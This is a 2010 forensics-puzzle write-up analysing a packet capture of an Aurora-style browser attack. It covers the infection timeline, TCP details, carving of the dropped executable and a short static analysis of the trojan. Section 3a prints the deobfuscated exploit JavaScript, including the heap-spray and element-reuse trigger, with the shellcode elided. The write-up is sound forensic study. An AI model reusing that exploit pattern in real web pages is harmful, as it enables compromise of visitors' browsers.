Name: Candice Quates Description: The analysis so far, Puzzle #6, Ann DerCover and Vick Timmes. Contents: 0. Introduction and tools 1. Packet capture major event timeline 2. Questions answered by looking at pcap in Wireshark 3. Questions answered by extracting files 3a. The file of javascript 3b. Getting the executable / writing a carver 4. So, what really happened? Where is the C&C? 0. Introduction and tools So we have an Aurora puzzle here. There is a bit of mystery as to how these attacks actually work; is Ann waiting on the other end controlling Vick's every move, or is it all programmed in to the exploit and trojan horse programs? Amidst this we have been asked to come up with answers to several packet-based questions, and some file-based ones. How far down the rabbit hole of javascript and exploit analysis should we go? Tools. Tools are fun. I used primarily wireshark on ubuntu for the plain packet analysis, and NetworkMiner in a Windows XP vmware instance to extract the initial HTTP infection, as well as for a nice overview of sessions. I used my own hastily written carver to extract the exe files from the "follow tcp stream, save as" dumps in wireshark, and checked my results of that against foremost. The free linux hex editor 'hte' (hte.sourceforge.net) can parse the PE header data and disassemble without needing to boot into a vm to use a nice windows hex editor. It's a little shaky for actual editing, though. As I mentioned rabbit holes, until this puzzle I had only passing knowledge of the javascript exploit vector, and I spent quite a bit of time reading up on it. Something also possessed me to write a carver in the middle of the night, but I have wanted to make one of those to use as a basis for other code for some time. 1. Packet capture major event timeline Packet#|Time(s)|Event description ------------------------------------------------------------- 1 0.0 Vick clicks link http://10.10.10.10:8080/index.php 9 0.46 .gif file in iframe of index.php is requested 13 1.3 TCP session from vick to port 4444 begins 17 1.52 Packet containing start of EXE file on port 4444 arrives 1153 35.95 Connection attempts to port 4445 begin (and fail) 1562 87.6 Connection on port 4444 starts to ends 1565 87.6 Port 4444 finishes closing 1652 122.7 Start of successful port 4445 connection 1656 123.6 Successful connection handshake done on port 4445 1660 123.9 EXE file download from port 4445 begins 2552 198.4 Connection on port 4445 starts to close 2554 198.4 Port 4445 finishes closing. Capture ends (This table uses tabs. Hopefully it will survive cut and paste.) 2. Questions answered by looking at pcap in Wireshark All of the above table data was found using wireshark. I also plugged this pcap file into NetworkMiner, and found that NetworkMiner seemed to ignore all the failed connection attempts. Maybe I missed something, but that struck me as odd. The table above I pieced together from my notes answering all of the different questions, as I had the packet numbers and times all scribbled down on paper. I took notes and kept them ordered by date, and cleaned them up later, adding some missing times and double-checking their locations. One packet related question which was a little tedious was question #7. I had to go figure out where in the wireshark settings you turn off the automatic sequence number hiding, (preferences->protocols->tcp). They changed every third packet of the failed connection attempts, except for the first attempt, where it changed on the fourth packet. I found out how to add a custom field to show the ip.id field to my packet capture log, using the wonder of google and mailing lists. For that, go into preferences, and make a new column with a custom type, and put 'ip.id' into the custom field. That made the id numbers come up very clearly, changing once per packet. For the port number changes part of problem #7, I made a table on paper in notes which I'll reproduce here: Packet Time Port attempting to connect to 4445 ------------------------------------------------------------- 1153 35.94 1037 1187 47.73 1038 1313 59.46 1039 1503 71.25 1040 1533 82.99 1041 1568 94.87 1042 1598 106.83 1043 1628 118.74 1044 <- success on this one, eventually >From this capture, the source port changes roughly every twelve seconds. 3. Questions answered by extracting files 3a. Javascript The first two files were nice and encapsulated in HTTP requests, and NetworkMiner came up with them easily. 'index.php' is full of obfuscated javascript. It is pretty simple to use search and replace in a programming editor (I just used vi) to rename the long ugly variables into generic short things. That made the entire process of tracing easier to work with. Variables named 1,2,3,4 are easier than gibberish. (headers removed) var var1 = "COMMENT"; var var2 = new Array(); for (i = 0; i < 1300; i++) { var2[i] = document.createElement(var1); var2[i].data = "vEI"; # answer #2 } var var3 = null; var var4 = new Array(); var unescapefunc = unescape; function func1() { var var5 = unescapefunc( '%u.......huge block of shellcode var var6 = unescapefunc( "%" + "u" + "0" + "c" + "0" + "d" + "%u" + "0" + "c" + "0" + "d" ); do { var6 += var6 } while( var6.length < 0xd0000 ); for (PEf = 0; PEf < 150; PEf++) var4[PEf] = var6 + var5; } function func2(func2arg) { func1(); var3 = document.createEventObject(func2arg); document.getElementById("element").innerHTML = ""; window.setInterval(func3, 50); } function func3() { p = "\u0c0f\u0c0d...shellcode-looking stuff for (i = 0; i < var2.length; i++) { var2[i].data = p; } var t = var3.srcElement; } X/scriptX X/headX XbodyX Xspan id="element"XXiframe src="/index.phpmfKSxSANkeTeNrah.gif" onload="func2(event)" /XX/spanXX/bodyXX/htmlX At the end here, you can clearly see the URL of the gif file, which launches our function, and runs the exploit. I'm not entirely clear how the giant block of shellcode does its magic, but I did extract it with spidermonkey and look at it. Deep analysis of javascript-based shellcode is not something I've done before, and after starting that I realized I might not finish the puzzle if I kept it up. It definitely got me started learning about how browser based attacks work, and I'll definitely take a closer look at it later. >From what I can understand, the iframe loads the gif file, which by the onload call, runs func2() which runs func1() with its giant shellcode block, sets some stuff, and then sets up a 50 ms loop with window.setInterval to run func3() over and over again. I think that func1() contains the exploit (and maybe the port 4444 connection), and the loop running func3() may be the other connect-back attempts. The packet capture doesn't really help me figure this out. As for the md5 of the .gif file: df3e567d6f16d040326c7a0ea29a4f41 index.phpmfKSxSANkeTeNrah.gif 3b. Getting the executable freed So, I found the two port 4444 and 4445 tcp executable streams pretty easily, and separated them out into server->client only in wireshark "follow tcp stream" and saved each. They both contain a bunch of junk before the MZ, and it's not immediately apparent how big the executables within are. -rw-r--r-- 1 833133 2010-06-23 19:53 puzzle6-packet1656stream.raw -rw-r--r-- 1 1239098 2010-06-23 19:52 puzzle6-packet17stream.raw I opened one up in a hex editor (hte again) and deleted off the first few characters, closed it, and got into the PE header information, trying to figure out how to calculate the file size. Puzzled at it for a while, considering there is no raw image filesize file in th PE spec, and realized that the last section information is the key: in the last entry of the section header table, it has the offset to the last file section and it's size. Adding these two together would produce the filesize. I went and pulled up the finished executable from forensics puzzle #5, fired up the editor, and a hex calculator, dug down to the two values and there it was, the size. Now, how to do that with a program? In my case, C and fseek. (Yes, I could have just used foremost, I know. But this only took a little over two hours late one evening, and it was fun.) The program searched for MZ, PE and then consumed bytes to get their values and added offsets to get to the next part of information. I wrote the program using a PE file to test the output, step by step, that did not need to be carved so as to have a clear place to start. (Again, the puzzle #5 executable.) Then I tried running it on both executables. I got the same file for both, plugged the md5 into virustotal and came up with nothing; then I looked at my extracted files a little more carefully and realized they were one byte too big. Fixing the program to carve off on an even number of bytes (PE files always end on padded boundaries, I'm not sure it's possible to have one with an odd size) and it found something that looked like malware! -rw------- 1 748032 2010-06-26 22:43 pefileL995r b062cb8344cd3e296d8868fbef289c7c pefileL995r http://www.virustotal.com/analisis/14f489f20d7858d2e88fdfffb594a9e5f77f1333c7c479f6d3f1b48096d382fe-1276598794 As well, somewhere in this process I decided to run foremost on the packet captures as well, and it came up with the same md5 as I have here. At this point, having checked out the file well enough without really going into the nuts and bolts, I went on to try to finish up the puzzle and see why all of these different things happened, because there is a lot of unexplained extra traffic after these files are downloaded on the port 4444 and 4445 connections. If there is any time left before contest end I will sandbox this and get back to you guys. 4. So, what really happened? Where is the C&C? To be honest? I'm not entirely sure. The traffic on the port 4444 connection after the PE file ends looks like gobbledygook. I did some unix tricks to split the end off (split -b) and did a find in wireshark to find the packet where it ends, which is about at packet 607, which is well before the port 4445 connection attempts start. There are a lot of imports and exports in the file we downloaded, which doesn't seem right for normal malware, but a lot of them are "connection" functions, probably for connecting into a botnet or something of that nature. Assuming Ann was planning more after she got the trojan to run on this machine. Perhaps a quick behavioral analysis will get us some more leads? No, not really, at least in my sandbox setup. I fed the binary to it, and it just checked a bunch of stuff in the registry and exited. I noticed though, that the binary doesn't really look packed at all, so I put it into IDApro (free) and started digging. It's got some simple anti-debugger tricks at the dll entry point (SEH and a system call to "IsDebuggerPresent) and actually has imports and exports present, which is pretty weird, I thought. It looks like OpenSSL (0.98k) and Zlib are linked in static, because the strings for their code are all in the resources section. I started chasing malware-ish looking functions in the exports section back up through the code, and found possible evidence of a keylogger (ReadConsoleInputA) and of process memory modification (WriteProcessMemory) which is hooking other code to hide itself. Looks like a trojan to me, but I have not found the source of the communications code; I found lots of create packet/recieve packet/send packet sort of functions, but not anything to help me answer the question: why did the port 4445 download start? >From here I am out of time, and I hope you like my analysis, incomplete as it may be. Candice Quates, June 2010.